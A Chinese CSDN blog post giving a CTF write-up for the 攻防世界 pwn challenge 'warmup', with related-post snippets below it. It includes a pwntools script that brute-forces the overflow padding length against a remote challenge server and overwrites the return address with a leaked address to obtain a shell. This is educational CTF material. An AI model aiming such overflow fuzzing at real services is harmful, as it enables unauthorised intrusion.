[攻防世界 pwn]——warmup

最新推荐文章于 2023-01-02 12:55:29 发布
最新推荐文章于 2023-01-02 12:55:29 发布
阅读量629 收藏
点赞数 1
分类专栏: # 攻防世界
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Y_peak/article/details/113881994
版权
"本文介绍了参与CTF比赛时遇到的一个栈溢出题目——warmup。通过nc连接服务器发现可能的地址,推测该地址可用于执行特定命令。作者编写了exploit脚本,尝试不同长度的填充以触发栈溢出,目标是找到执行system("/bin/sh")或system("catflag")的条件。博客展示了尝试过程及交互式shell的获取。"
摘要由CSDN通过智能技术生成

[攻防世界 pwn]——warmup

  • 题目地址: https://adworld.xctf.org.cn/
  • 题目:
    在这里插入图片描述
    嘶, 碰过的第一个盲打的题, nc连上之后只有一个地址, 这个地址肯定是个有用的地址, 应该就是可以执行 system("/bin/sh")或者 system(“cat flag”)的地址。
    在这里插入图片描述
    提供了一个输入, 应该是可以进行栈溢出, 不然就太难了。尝试一下, 不过不知道要填充的长度也不知道是64位还是32位的。
    我们只有挨个尝试, 写个exp如下:

exploit

from pwn import *
ret_addr = 0x40060d

def fuzz(p, n, flag):
	payload = 'a' * n
	if flag==1:
	    payload += p32(ret_addr)
	if flag==2:
	    payload += p64(ret_addr)
	p.recvuntil(">")
	p.sendline(payload)

def main():
	for i in range(1000):
	    print(i)
	    for j in range(1, 3):
		try:
		    p = remote('111.200.241.244',45566)
		    fuzz(p, i, j)
		    print p.recv()   
		    p.interactive()
		except:
		    p.close()
main()

在这里插入图片描述

Y-peak
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
攻防世界PWN进阶区(warmup
BurYiA的博客
02-03 1521
warmup 这是一个没有附件的题,看起来题目是要求我们fuzz了 nc连接上后可以发现有个输入点,并且还给了我们一个十六进制数,看起来是个地址 那首先根据这些我们可以先将fuzz函数写出来,分三种情况(不用他给的地址,用p32发送,用p64送) def fuzz(r, num, flag): payload = 'a' * num if flag==1: pa...
攻防世界pwn(warmup&welpwn)
song_10的博客
05-21 450
攻防世界pwn题题解记录
CTF(pwn)攻防世界warmup
半岛铁盒的博客
03-06 882
题目描述 这种题很有意思,只给了题目场景地址没有文件,让你盲打,类似于web中的盲注吧; nc连接,给了 目标地址, 思路是:利用栈溢出覆盖,返回这个地址; 具体是溢出多少是不确定的,是P64(),还是 P32() 也是不确定的; 写个EXP逐渐试一下 from pwn import * a = 0x40060d for i in range(10,100): p = remote('111.200.241.244',49684) payload='a'*i+p64(a) p.recvun
攻防世界——pwn_warmup
syk的博客
05-28 1791
checksec:没有开启任何保护 看到了熟悉的gets()函数,通常一看到这个函数就八成有缓冲区溢出漏洞,可以看出程序为v5开辟了40H的存储空间,所以输入长度超过40H即可造成溢出,再看sprint()函数 可以看到这个函数是获取flag的关键点,程序会打印出此函数的位置,即0x40060d,到这里思路就差不多明了了,我们需要控制溢出位置,把返回地址改为此函数的地址,我们当前函数的返回值位...
pwn_warmup
weixin_44464829的博客
10-31 371
这个题没有附件,只好nc服务器: 发现给了我们一个类似地址的东西,该怎么利用。 猜想flag应该就在这个地址,或者这个地址的附近。这里不得不提到一个方法叫做fuzz(模糊测试): Fuzzing是指通过构造测试输入,对软件进行大量测试来发现软件中的漏洞的一种模糊测试方法。在CTF中,fuzzing可能不常用,但在现实的漏洞挖掘中,fuzzing因其简单高效的优势,成为非常主流的漏洞挖掘方法。 所以额,我们要写一个函数,这个函数可以为我们生成很多地址,如果这个地址正确了,flag就会被我拿到 d
攻防世界pwn题:Recho.doc
07-13
攻防世界pwn题:Recho.doc 知识点总结 本文总结了攻防世界pwn题:Recho.doc的知识点,涵盖了二进制文件分析、栈溢出、ROP技术、libc泄露、系统调用等多个方面。 1. 二进制文件分析 攻防世界pwn题:Recho.doc是一...
攻防世界pwn题:forgot.doc
07-13
攻击防御世界pwn题:forgot.doc 本文档是关于攻击防御世界pwn题的Forgot.doc,涉及到有限状态自动机、正则表达式、电子邮件地址验证、Lua、IDA静态分析、canary和PIE保护机制、scanf函数溢出漏洞、栈溢出攻击、...
warmup pwn入门题
02-11
pwn入门题
0ctf_2016_warmup
05-17
2016年0ctf的pwn题。
awd攻防比赛总结——3s_NwGeek.docx
09-30
首先,作者介绍了比赛的规则和环境,包括多个环境、Web 和 Pwn 等。然后,作者分享了自己的战略和技巧,其中包括挖洞、补洞、溯源分析和可持续访问等。 在比赛中,作者遇到了很多的问题,例如服务器Environment会...
攻防世界warmup pwn wp(fuzz)
苗_的博客
10-15 755
发现这题没给附件,所以是要fuzz的题目(最开始不知道什么叫fuzz = =,在这里解释一下,(fuzzing)模糊测试的意思,百度是这样解释的:模糊测试(Fuzzing),是一种通过向目标系统提供非预期的输入并监视异常结果来发现软件漏洞的方法。 首先先远程看一下: 可以发现给了我们一个十六进制数(应该是地址) 那首先根据这些我们可以先将fuzz函数写出来,分三种情况——不用他给的地址(0),用p32发送(1),用p64送(2) exp from pwn import* addr = 0x
攻防世界-warmup详解
wwxxss
11-10 2272
warmup详解
攻防世界】Web warmup
DG_s1mple
01-02 835
这一题主要是利用了include的特性如果include的文件名中含有“/”,那么它会识别其为一个带目录的文件,只有最后一个“/”后的字符串对应的文件会被包含,而前面的字符串都只是在指定目录意思是,如果我们的payload是这样的对于include来说,就只会识别"/"后面的内容,变成了解了这个特性之后,我们就可以开始做题了。
攻防世界PWN进阶区pwn100/pwn200/warmup
weixin_45461609的博客
05-12 511
攻防世界PWN进阶区pwn200pwn100 pwn200 和CTFWIKI上的ret2libc3大同小异。 条件: 1.有read(),write()函数,无system。 2.在函数sub_8048484中存在栈溢出。 思路: 1.通过栈溢出调用write()函数泄露write()对应的 got 表项的内容,此处将write函数的返回地址设置为main或者sub_8048484的地址以便再次利用栈溢出漏洞 2.通过LibcSearcher获取libc版本 3.获取system函数,”/bi
warmup_攻防世界
u014794949
10-29 153
进入页面什么都没有,查看控制台 注释提示source.php,地址栏输入查看源码 提示存在hint.php,访问后显示 得到存储flag的文件名 现在分析满足函数条件的payload 函数作用是分三步检查传进来的参数是否满足白名单: $whitelist = ["source"=>"source.php","hint"=>"hint.php"]; 第一步: if (! isset($page) || !is_string($page)) { echo "y
pwn-warmup
醉等佳人归
09-08 212
1.题目 1.1.保护机制 不详 1.2.关键代码 没有提供代码 我们使用nc连接之后发现给了一个输入点和一个地址 2.思路 重点1:没有给代码,说明要我们使用fuzz 重点2:猜测给的地址是漏洞利用函数地址,应该可以通过栈溢出去调用, 重点3:所以我们fuzz的参数应该有两个,第一个是num即发送的字符串,第三个是flag即跟随的payload函数(0代表不跟随,1代表32位,2代表64位) from pwn import * from ctypes import * #context(arch="a
攻防世界warmup -wp
freerats的博客
07-17 358
打开一个笑脸。查看源代码,提示source.php,打开发现代码 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"]; if (! isset($page) || !is_string($page)) { echo "you can't
buu:pwn warmup_csaw_2016
weixin_60553183的博客
11-29 2627
buu:pwn warmup_csaw_2016 第一次写pwn题,得到文件放入ida 其实一开始和re的题很像,都是寻找关键函数,怎么找,个人理解是要关注输入输出有无比较的地方,这里shb_40060D很明显就是关键函数,点进去,为什么呢,因为gets()函数很明显会有栈溢出漏洞,sub_40060D函数是后门。 找到了system和 cat flag.txt。 进入虚拟机,对文件进行checksec操作 发现没有任何防护 写exp 在终端运行得flag. ...
攻防世界之web warmup 详解
m0_52663093的博客
11-11 490
一 解题思路 我们进来之后会发现有一个滑稽表情哦 我的思路就是先点进去查看源代码 源代码如下: 二 详细步骤 我们打开源码之后 首先想到的就是去访问source.php 源码如下: 在这里我思考了好久 找到了一个php文件 于是同样思路继续访问 我们可以看到如下结论 在这里可以想到给了4个f l a g 于是我们可以试一下payload构造 简单说就是include文件包含是遇到 …/…/会将以.开头,则解析器会在当前目录的父目录下寻找该文件,所以我们要进行转义。或者...
攻防世界 pwn repeater
最新发布
09-13
攻防世界是一个CTF竞赛平台,其中包含了各种类型的题目,包括pwn和repeater题目。根据引用中提到的信息,攻防世界标记的难度可能不准确。这可能是因为题目的实际难度与标记的难度不一致,导致出现了这种情况。 至于repeater题目,根据引用中提供的代码,该题目涉及到了远程攻击和内存溢出的技术。代码中使用了pwn工具包来进行远程连接和漏洞利用。通过发送一段恶意输入,攻击者可以覆盖程序的返回地址,使得程序执行恶意的shellcode。 具体地说,代码中通过发送一系列的输入,包括恶意shellcode,使得程序发生内存溢出,覆盖了主函数的返回地址,从而让主函数正常退出,并跳转到shellcode的首条指令处。 在此过程中,使用了pwn工具包中的一些功能,如远程连接、编码shellcode等。代码中也展示了一些具体的操作步骤,如发送输入、计算地址等。 综上所述,攻防世界中的pwn和repeater题目分别涉及到了漏洞利用和内存溢出的技术。通过精心构造的输入,攻击者可以利用程序的漏洞来执行恶意代码。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值